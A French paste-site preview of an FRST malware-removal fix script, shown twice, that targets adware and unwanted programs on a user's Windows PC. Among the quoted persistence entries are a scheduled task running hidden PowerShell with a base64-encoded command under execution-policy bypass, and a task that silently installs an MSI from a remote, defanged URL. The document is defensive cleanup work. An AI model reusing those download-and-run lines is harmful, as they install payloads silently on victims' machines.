Publicité
Publicité
Format du document : text/plain
Prévisualisation
start
CloseProcesses:
Hosts:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKLM\...\Providers\zwhr6ilc: C:\Program Files (x86)\Wzetionploteing Agent\local64spl.dll
C:\Program Files (x86)\Wzetionploteing Agent\local64spl.dll
SearchScopes: HKU\S-1-5-21-1169033408-1348241669-2457401725-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
R2 Kyubey; C:\Users\Kahïne\AppData\Roaming\Kyubey\Kyubey.exe [113664 2017-03-01] () [Fichier non signé]
C:\Users\Kahïne\AppData\Roaming\Kyubey\Kyubey.exe
R2 OtherSearch; C:\Program Files (x86)\RvkYfikrHi\kl.dll [467456 2017-02-21] () [Fichier non signé] <==== ATTENTION
C:\Program Files (x86)\RvkYfikrHi\kl.dll
R2 WinSnare; C:\Users\Kahïne\AppData\Roaming\WinSnare\WinSnare.dll [778752 2017-03-01] (InterSect Alliance Pty Ltd) [Fichier non signé]
C:\Users\Kahïne\AppData\Roaming\WinSnare\WinSnare.dll
S2 WinSAPSvc; C:\Users\Kahïne\AppData\Roaming\WinSAPSvc\WinSAP.dll [X]
R1 805365e8bae1cc74e42a0d5d1605bc75; C:\Windows\system32\drivers\805365e8bae1cc74e42a0d5d1605bc75.sys [96272 2017-02-17] (A1XDIQ) <==== ATTENTION
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
2017-03-01 14:34 - 2017-03-03 18:18 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\WinSAPSvc
2017-03-01 14:34 - 2017-03-01 14:34 - 00003668 _____ C:\Windows\System32\Tasks\Milimili
2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\WinSnare
2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\Kyubey
2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.2.0)
2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Program Files (x86)\MIO
2017-03-01 14:34 - 2017-03-01 14:34 - 00003342 _____ C:\Windows\System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel
2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Program Files (x86)\BikaQRss
2017-02-22 11:27 - 2017-02-22 11:27 - 00002052 _____ C:\Windows\System32\Tasks\0GDGTRNtwl
2017-02-22 11:26 - 2017-02-22 16:52 - 00000000 ____D C:\Program Files (x86)\RvkYfikrHi
2017-02-22 11:13 - 2017-02-22 11:18 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\One System Care
2017-02-22 11:13 - 2017-02-22 11:16 - 00000310 _____ C:\Windows\Tasks\One System CarePeriod.job
2017-02-22 11:13 - 2017-02-22 11:13 - 00024460 _____ C:\Windows\System32\Tasks\{0C7F0C47-0E78-0B09-0E11-04790D0A110A}
2017-02-22 11:13 - 2017-02-22 11:13 - 00003688 _____ C:\Windows\System32\Tasks\One System Care Task
2017-02-22 11:13 - 2017-02-22 11:13 - 00003446 _____ C:\Windows\System32\Tasks\One System Care Run Delay
2017-02-22 11:13 - 2017-02-22 11:13 - 00003376 _____ C:\Windows\System32\Tasks\One System Care Monitor
2017-02-22 11:13 - 2017-02-22 11:13 - 00002940 _____ C:\Windows\System32\Tasks\One System CarePeriod
2017-02-22 11:13 - 2017-02-22 11:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2017-02-22 11:12 - 2017-02-22 11:16 - 00000000 ____D C:\Program Files (x86)\Wzetionploteing Agent
2017-02-22 11:12 - 2017-02-22 11:12 - 00006142 _____ C:\Windows\System32\Tasks\Wzetionploteing Agent
2017-02-14 11:39 - 2017-02-14 11:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2017-02-14 11:39 - 2017-02-14 11:39 - 00000000 ____D C:\Program Files (x86)\QuickTime
2017-02-22 19:10 - 2017-01-25 00:54 - 00003292 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task v2
C:\Windows\System32\Tasks\OneDrive Standalone Update Task v2
BikaQ Rss (HKLM-x32\...\{78A2D999-4673-4FCC-818E-57B0AF8F3B70}) (Version: 2.0.16 - BikaQ) <==== ATTENTION
OtherSearch (HKLM-x32\...\OtherSearch) (Version: 4.0.0.0 - Skyler Emil) <==== ATTENTION
Social2Search (HKLM\...\24e31a98c99476ff052fa026d1c56c37) (Version: 11.13.1.8 (i1.0) - Social2Search) <==== ATTENTION
WinSnare (HKLM-x32\...\{8F3FD9A4-A3CB-444A-BAF7-F9A13C2BC1C7}) (Version: 4.2.0 - WinSnare) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{9E758FF8-D63C-43B6-BD77-B2613A9868F5}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{EB175CFA-84CB-4E80-B7D6-723D741A3CDC}) (Version: - ) <==== ATTENTION
Task: {126E8528-0E9B-46D5-93A3-31D5B8F7E887} - System32\Tasks\0GDGTRNtwl => C:\Program Files (x86)\RvkYfikrHi\updengine.exe <==== ATTENTION
Task: {137E1FC5-2672-4C8E-AA6A-677BC155283C} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
Task: {3EA59DC9-51EE-49C6-8845-D88CCE9B19AE} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-01] ()
Task: {45823CB0-380E-48F1-AEA1-618678555160} - System32\Tasks\Wzetionploteing Agent => C:\Program Files (x86)\Perhuspratph\ghuzaph.exe [2017-02-22] (Glarysoft Ltd)
Task: {53B779CB-5691-45F9-8A95-246F66052BE0} - System32\Tasks\{0C7F0C47-0E78-0B09-0E11-04790D0A110A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAOwAgADsAOwA7ADsAOwAgADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIA (l'élément de données a 9992 caractères en plus). <==== ATTENTION
Task: {55BE4147-3E4E-4B0F-BEE0-4F18606AB1F0} - System32\Tasks\Pohrythajodom => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=CrucialXCT275MX300SSD1_16451497E56D1497E56D&v=2017222 /q
Task: {C4CF87F1-03FF-45B9-82CC-2BB62A549E4B} - System32\Tasks\One System Care Task => C:\PROGRA~2\ONESYS~1\SYSTEM~1.EXE <==== ATTENTION
Task: {C68442DB-1B84-478B-A688-5F082E32904A} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe <==== ATTENTION
Task: {D79299B6-6FCF-43C1-A474-C626C5B4C924} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files (x86)\BikaQRss\BikaQ.exe [2017-02-23] (IEC) <==== ATTENTION
Task: {E654EE38-9081-4631-B3DC-8899D2613088} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
Task: C:\Windows\Tasks\One System CarePeriod.job => <==== ATTENTION
2017-02-21 09:38 - 2017-02-21 09:38 - 00467456 _____ () C:\Program Files (x86)\RvkYfikrHi\kl.dll
EmptyTemp:
end
CloseProcesses:
Hosts:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKLM\...\Providers\zwhr6ilc: C:\Program Files (x86)\Wzetionploteing Agent\local64spl.dll
C:\Program Files (x86)\Wzetionploteing Agent\local64spl.dll
SearchScopes: HKU\S-1-5-21-1169033408-1348241669-2457401725-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
R2 Kyubey; C:\Users\Kahïne\AppData\Roaming\Kyubey\Kyubey.exe [113664 2017-03-01] () [Fichier non signé]
C:\Users\Kahïne\AppData\Roaming\Kyubey\Kyubey.exe
R2 OtherSearch; C:\Program Files (x86)\RvkYfikrHi\kl.dll [467456 2017-02-21] () [Fichier non signé] <==== ATTENTION
C:\Program Files (x86)\RvkYfikrHi\kl.dll
R2 WinSnare; C:\Users\Kahïne\AppData\Roaming\WinSnare\WinSnare.dll [778752 2017-03-01] (InterSect Alliance Pty Ltd) [Fichier non signé]
C:\Users\Kahïne\AppData\Roaming\WinSnare\WinSnare.dll
S2 WinSAPSvc; C:\Users\Kahïne\AppData\Roaming\WinSAPSvc\WinSAP.dll [X]
R1 805365e8bae1cc74e42a0d5d1605bc75; C:\Windows\system32\drivers\805365e8bae1cc74e42a0d5d1605bc75.sys [96272 2017-02-17] (A1XDIQ) <==== ATTENTION
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
2017-03-01 14:34 - 2017-03-03 18:18 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\WinSAPSvc
2017-03-01 14:34 - 2017-03-01 14:34 - 00003668 _____ C:\Windows\System32\Tasks\Milimili
2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\WinSnare
2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\Kyubey
2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.2.0)
2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Program Files (x86)\MIO
2017-03-01 14:34 - 2017-03-01 14:34 - 00003342 _____ C:\Windows\System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel
2017-03-01 14:34 - 2017-03-01 14:34 - 00000000 ____D C:\Program Files (x86)\BikaQRss
2017-02-22 11:27 - 2017-02-22 11:27 - 00002052 _____ C:\Windows\System32\Tasks\0GDGTRNtwl
2017-02-22 11:26 - 2017-02-22 16:52 - 00000000 ____D C:\Program Files (x86)\RvkYfikrHi
2017-02-22 11:13 - 2017-02-22 11:18 - 00000000 ____D C:\Users\Kahïne\AppData\Roaming\One System Care
2017-02-22 11:13 - 2017-02-22 11:16 - 00000310 _____ C:\Windows\Tasks\One System CarePeriod.job
2017-02-22 11:13 - 2017-02-22 11:13 - 00024460 _____ C:\Windows\System32\Tasks\{0C7F0C47-0E78-0B09-0E11-04790D0A110A}
2017-02-22 11:13 - 2017-02-22 11:13 - 00003688 _____ C:\Windows\System32\Tasks\One System Care Task
2017-02-22 11:13 - 2017-02-22 11:13 - 00003446 _____ C:\Windows\System32\Tasks\One System Care Run Delay
2017-02-22 11:13 - 2017-02-22 11:13 - 00003376 _____ C:\Windows\System32\Tasks\One System Care Monitor
2017-02-22 11:13 - 2017-02-22 11:13 - 00002940 _____ C:\Windows\System32\Tasks\One System CarePeriod
2017-02-22 11:13 - 2017-02-22 11:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2017-02-22 11:12 - 2017-02-22 11:16 - 00000000 ____D C:\Program Files (x86)\Wzetionploteing Agent
2017-02-22 11:12 - 2017-02-22 11:12 - 00006142 _____ C:\Windows\System32\Tasks\Wzetionploteing Agent
2017-02-14 11:39 - 2017-02-14 11:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2017-02-14 11:39 - 2017-02-14 11:39 - 00000000 ____D C:\Program Files (x86)\QuickTime
2017-02-22 19:10 - 2017-01-25 00:54 - 00003292 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task v2
C:\Windows\System32\Tasks\OneDrive Standalone Update Task v2
BikaQ Rss (HKLM-x32\...\{78A2D999-4673-4FCC-818E-57B0AF8F3B70}) (Version: 2.0.16 - BikaQ) <==== ATTENTION
OtherSearch (HKLM-x32\...\OtherSearch) (Version: 4.0.0.0 - Skyler Emil) <==== ATTENTION
Social2Search (HKLM\...\24e31a98c99476ff052fa026d1c56c37) (Version: 11.13.1.8 (i1.0) - Social2Search) <==== ATTENTION
WinSnare (HKLM-x32\...\{8F3FD9A4-A3CB-444A-BAF7-F9A13C2BC1C7}) (Version: 4.2.0 - WinSnare) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{9E758FF8-D63C-43B6-BD77-B2613A9868F5}) (Version: - ) <==== ATTENTION
youndoo - Uninstall (HKLM-x32\...\{EB175CFA-84CB-4E80-B7D6-723D741A3CDC}) (Version: - ) <==== ATTENTION
Task: {126E8528-0E9B-46D5-93A3-31D5B8F7E887} - System32\Tasks\0GDGTRNtwl => C:\Program Files (x86)\RvkYfikrHi\updengine.exe <==== ATTENTION
Task: {137E1FC5-2672-4C8E-AA6A-677BC155283C} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
Task: {3EA59DC9-51EE-49C6-8845-D88CCE9B19AE} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-03-01] ()
Task: {45823CB0-380E-48F1-AEA1-618678555160} - System32\Tasks\Wzetionploteing Agent => C:\Program Files (x86)\Perhuspratph\ghuzaph.exe [2017-02-22] (Glarysoft Ltd)
Task: {53B779CB-5691-45F9-8A95-246F66052BE0} - System32\Tasks\{0C7F0C47-0E78-0B09-0E11-04790D0A110A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACAAOwAgADsAOwA7ADsAOwAgADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIA (l'élément de données a 9992 caractères en plus). <==== ATTENTION
Task: {55BE4147-3E4E-4B0F-BEE0-4F18606AB1F0} - System32\Tasks\Pohrythajodom => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=CrucialXCT275MX300SSD1_16451497E56D1497E56D&v=2017222 /q
Task: {C4CF87F1-03FF-45B9-82CC-2BB62A549E4B} - System32\Tasks\One System Care Task => C:\PROGRA~2\ONESYS~1\SYSTEM~1.EXE <==== ATTENTION
Task: {C68442DB-1B84-478B-A688-5F082E32904A} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe <==== ATTENTION
Task: {D79299B6-6FCF-43C1-A474-C626C5B4C924} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files (x86)\BikaQRss\BikaQ.exe [2017-02-23] (IEC) <==== ATTENTION
Task: {E654EE38-9081-4631-B3DC-8899D2613088} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
Task: C:\Windows\Tasks\One System CarePeriod.job => <==== ATTENTION
2017-02-21 09:38 - 2017-02-21 09:38 - 00467456 _____ () C:\Program Files (x86)\RvkYfikrHi\kl.dll
EmptyTemp:
end